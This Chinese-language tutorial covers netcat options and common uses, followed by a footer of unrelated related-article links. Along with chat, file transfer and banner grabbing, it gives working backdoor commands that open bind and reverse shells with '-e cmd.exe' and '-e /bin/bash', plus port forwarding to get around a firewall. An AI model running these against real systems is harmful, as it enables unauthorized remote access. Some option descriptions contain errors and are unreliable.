netcat命令选项

本文参考文章链接

本文参考文章链接1

本文参考文章链接2

本文参考文章链接3

常用命令选项

## 网络模式和代理相关

-l 监听,作服务器。不填时作客户端。

-u UDP模式。不填时默认TCP模式。

-X 和 -x 是代理相关的选项

## 其余常用选项

-v verbose模式,打印更多日志

-z 连接以后就断开,用于测试网络连接是否连通 //探测端口的连通性

-w 超时时间,单位是秒

-s 指定source addr

-p 指定source port

-n 只识别IP地址,不查询DNS

-k 处理完一个请求之后,继续监听下一个

-d 脱离命令行窗口,在后台运行,常用于后门建立的过程

-e 执行某个程序,常用于后门建立的过程

-L 设置netcat处于监听状态等待链接,当客户端断开,服务器依旧回到等待状态

基本全部命令选项

用法:

ncat [选项] [主机名] [端口]

花费时间的选项以秒为单位。 附加“ ms”毫秒,“ s”表示秒,“ m”表示分钟,或“ h”表示小时(例如500ms)。

-4    仅使用IPv4

-6    仅使用IPv6

-U, --unixsock 仅使用Unix域套接字

	--vsock 仅使用vsock套接字

-C, --crlf 将CRLF用于EOL序列

-c, --sh-exec <command> 通过/bin/sh执行给定命令

-e, --exec <command> 执行给定命令

	--lua-exec <filename> 执行给定的Lua脚本

-g hop1[,hop2,...] 松散的源路由跳跃点(最大8个)

-G <n> 松散的源路由跳跃指针(4、8、12,...)

-m, --max-conns <n> 最大<n>同时连接

-h, --help 显示此帮助屏幕

-d, --delay <time> 在读/写之间等待时间

-o, --output <filename> 将会话数据转储到文件中

-x, --hex-dump <filename> 将会话数据以十六进制形式转储到文件中

-i, --idle-timeout <time> 空闲读/写超时时间

-p, --source-port port 指定要使用的源端口

-s, --source addr 指定要使用的源地址(不影响-l)

-l, --listen 绑定并监听传入的连接

-k, --keep-open 在侦听模式下接受多个连接

-n, --nodns 不通过DNS解析主机名

-t, --telnet 回答Telnet协商

-u, --udp 使用UDP代替默认TCP

	--sctp 使用SCTP代替默认TCP

-v, --verbose 使用SCTP代替默认TCP

-w, --wait <time> 连接超时时间

-z   零I/O模式,仅报告连接状态

1. 模拟聊天

  • 服务器
nc -l -p [端口号]
  • 客户端
nc [服务器ip] [服务器端口]

2.Banner抓取方法

  • Banner是一个文本,Banner是一个你连接的服务器发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。
echo "" | nc -v -n w1 [target_ip] [开始端口-结束端口]

3.文件传输

从客户端传输文件到服务器

  • 服务器
nc -l -p [端口号] > out_filename
  • 客户端
nc [目标IP] [目标端口] < in_flimename

从服务器传输文件到客户端

  • 服务器
nc -l -p [端口号] < in_filename
  • 客户端
nc [目标IP] [目标端口] > out_flimename

4.目录传输(与文件传输类似)

  • 服务器
tar -cvf - dir_name | nc -l [port_id]
  • 客户端
nc -n [target_ip] [target_port] | tar -xvf -

5. windows建立后门的方法

服务器——监听型后门

nc -l -p [port_id] -e cmd.exe

客户端——连接型后门

nc [target_ip] [target_port] -e cmd.exe

6、Linux下建立后门

服务器——监听型后门

nc -l -p [port_id] -e /bin/bash

客户端——连接型后门

nc [target_ip] [target_port] -e /bin/bash

7、连接转发

  • 可以解决的问题
  1. 对于无法访问内网特定机器的问题,我们可以先抓取内网一台机器,然后利用这台弱鸡进行端口转发,接受外网的数据,将数据转发到内网目标机器的特定端口。
'''假设机器A和机器B是内网机器,机器B是我们的目标机器,机器C是外网机器,机器C和机器A是出于同一网段的,可以互相访问,机器C不可以访问机器B'''# bat文件中的内容: nc [ip_B] [port_B]A: nc -l -p [port_A] -e XX.batB: nc -l -p [port_B] C: nc [ip_A] [prt_A]
  1. 对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口做端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火墙。
## 原理同上

8、反弹shell

Netcat基础使用的更多相关文章

  1. Kali Linux渗透基础知识整理(四):维持访问

    Kali Linux渗透基础知识整理系列文章回顾 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限.使用木马程序.后门程序和rootkit来达到这一目的.维持访问是一种艺术形式 ...

  2. NetCat使用手册

    简介:   在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手.因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少) ...

  3. 大数据基础知识问答----spark篇,大数据生态圈

    Spark相关知识点 1.Spark基础知识 1.Spark是什么? UCBerkeley AMPlab所开源的类HadoopMapReduce的通用的并行计算框架 dfsSpark基于mapredu ...

  4. Kali Linux Netcat 学习 与 网络攻击

    Netcat 网络攻击 以及 应用 1.用Netcat进行黑客攻击第1部分:基础知识 Netcat是一个很好的网络实用程序,用于使用TCP和UPD协议读取和写入网络连接.Netcat通常被称为网络工具 ...

  5. spark基础知识

    1.Spark是什么? UCBerkeley AMPlab所开源的类HadoopMapReduce的通用的并行计算框架. dfsSpark基于mapreduce算法实现的分布式计算,拥有HadoopM ...

  6. Wireshark、Netcat

    Wireshark Wireshark是一个网络数据包分析软件,功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据.为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发 ...

  7. 最全的spark基础知识解答

    原文:http://www.36dsj.com/archives/61155 一. Spark基础知识 1.Spark是什么? UCBerkeley AMPlab所开源的类HadoopMapReduc ...

  8. 20145205武钰_Exp5 MSF基础应用

    20145205武钰_Exp5 MSF基础应用 实验后回答问题 exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用.有漏洞不一定就有Exploit(利用).有Exploit就肯定有漏洞. ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

随机推荐

  1. P4544 [USACO10NOV]Buying Feed G

    part 1 暴力 不难发现有一个 $\mathcal O(K^2n)$ 的基础 dp: $$f_{i,j+l}=\min(f_{i,j+l},f_{i-1,j}+(x_i-x_{i-1})\time ...

  2. 网络基础--简单理解什么是DNS? TCP? UDP? Http? Socket?

    什么是IP 协议?  协议就是为了实现网络通信而创建的一系列规范.  通常我们的网络模型从上到下共分为4层: 应用层, 传输层, 网络层 和数据链路层. IP协议属于网络层协议,它精确定义了网络通信中 ...

  3. 面试官问我MySQL调优,我真的是

    面试官:要不你来讲讲你们对MySQL是怎么调优的? 候选者:哇,这命题很大阿...我认为,对于开发者而言,对MySQL的调优重点一般是在「开发规范」.「数据库索引」又或者说解决线上慢查询上. 候选者: ...

  4. 一文读懂 Serverless,将配置化思想复用到平台系统中

    作者 | 春哥大魔王 来源 | Serverless 公众号 写在前面 在 SaaS 领域 Salesforce 是佼佼者,其 CRM 的概念已经扩展到了 Marketing.Sales.Servic ...

  5. 如何通过 Serverless 轻松识别验证码?

    作者 | 江昱 来源 | Serverless 公众号 前言 Serverless 概念自被提出就倍受关注,尤其是近些年来 Serverless 焕发出了前所未有的活力,各领域的工程师都在试图将 Se ...

  6. 为什么下一个十年的主战场在 Serverless?

    作者 | 不瞋 阿里云 Serverless 负责人 "唯有超越,才能让我们走下去." 这是不瞋在阿里的第十年.从 2010 年加入阿里云,不瞋参与了阿里云飞天分布式系统的研发,历 ...

  7. 3D Analyst Tools(3D Analyst 工具)

    3D Analyst 工具 工具里有又细分如下分类: 注:以下代码的参数需要另行配置,不能直接执行:Python2不支持中文变量! 1.3D 要素 # Process: 3D 内部 arcpy.Ins ...

  8. React实现组件全屏化

    介绍 本文基于React+antd,给大家演示一个完整的全屏demo. 起因是开发今天给我提了一个sql编辑器输入框比较小,不支持放大,不太方便.希望能够全屏显示,联想到自己以后可能也会需要,便研究并 ...

  9. 浅尝装饰器和AOP

    [写在前面] 参考文章:https://www.cnblogs.com/huxi/archive/2011/03/01/1967600.html[从简单的例子入手进行讲解,由浅入深,很到位] 装饰器部 ...

  10. java中的软,弱,虚引用介绍与特性分析

    java的弱,虚,软引用介绍 1.弱,虚,软引用的介绍 对于绝大部分的对象而言,在程序中是存在着一个引用变量引用该对象,这是常见的引用方式,也就是常说的 强引用,对于强引用引用的对象,系统JVM是不会 ...